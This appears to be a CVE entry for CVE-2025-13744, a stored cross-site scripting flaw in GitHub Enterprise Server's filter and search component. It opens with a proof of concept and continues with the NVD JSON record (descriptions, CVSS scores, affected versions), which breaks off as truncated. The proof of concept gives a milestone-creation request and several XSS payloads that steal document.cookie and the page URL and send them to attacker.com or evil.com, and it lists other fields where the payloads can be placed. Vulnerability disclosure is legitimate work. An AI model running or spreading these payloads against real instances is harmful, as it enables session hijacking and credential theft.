CVE-2025-13744

// CVE-2025-13744 PoC - Stored XSS in GitHub Enterprise Server Filter Component // Steps to reproduce: // 1. Create a malicious milestone with XSS payload in name POST /repos/{owner}/{repo}/milestones { "title": "<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>", "description": "Malicious milestone" } // 2. Alternative payload using script tag // "title": "<script>fetch('https://evil.com?data='+btoa(document.cookie))</script>" // 3. When victim searches or uses filter, XSS executes // The malicious script sends cookies to attacker-controlled server // Example JavaScript payload for exfiltration: const xssPayload = ` <img src=x onerror=" fetch('https://attacker.com/log?c=' + encodeURIComponent(document.cookie) + '&u=' + encodeURIComponent(window.location.href)) "> `; // This payload can be placed in: // - Milestone names // - Issue titles // - Pull request titles // - Labels // - Any entity rendered in filter/search components

{"cve": {"id": "CVE-2025-13744", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:41.933", "lastModified": "2026-01-30T16:51:10.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation vulnerability was identified in GitHub Enterprise Server that allowed attacker controlled HTML to be rendered by the Filter component (search) across GitHub that could be used to exfiltrate sensitive information. An attacker would require permissions to create or modify the names of milestones, issues, pull requests, or similar entities that are rendered in the vulnerable filter/search components. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.1, and 3.18.2, 3.17.8, 3.16.11, 3.15.15, and 3.14.20. This vulnerability was reported via the GitHub Bug Bounty program."}, {"lang": "es", "value": "Una vulnerabilidad de neutralización incorrecta de entrada durante la generación de páginas web fue identificada en GitHub Enterprise Server que permitía que HTML controlado por el atacante fuera renderizado por el componente de filtro (búsqueda) en todo GitHub y que podría ser utilizado para exfiltrar información sensible. Un atacante requeriría permisos para crear o modificar los nombres de hitos, incidencias, solicitudes de extracción (pull requests), o entidades similares que se renderizan en los componentes de filtro/búsqueda vulnerables. Esta vulnerabilidad afectó a todas las versiones de GitHub Enterprise Server anteriores a la 3.20 y fue corregida en las versiones 3.19.1, y 3.18.2, 3.17.8, 3.16.11, 3.15.15, y 3.14.20. Esta vulnerabilidad fue reportada a través del programa GitHub Bug Bounty."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14.0", "versionEndExcluding": "3.14.20", "matchCriteriaId": "43EB11CA-6023-4B6E-824F-BC1E3B38BBC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15.0", "versionEndExcluding": "3.15.15", "matchCriteriaId": "6F3CBE73-32C5-4F1A-A660-3016FA77E633"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16.0", "versionEndExcluding": "3.16.11", "matchCriteriaId": "754773B0-BDEC-497C-91A7-F542A74C4414"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.17.0", "versionEndExcluding": "3.17.8", "matchCriteriaId": "5C3E38F9-7310-4901-90A8-C0BEAFA8A092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncludin ... (truncated)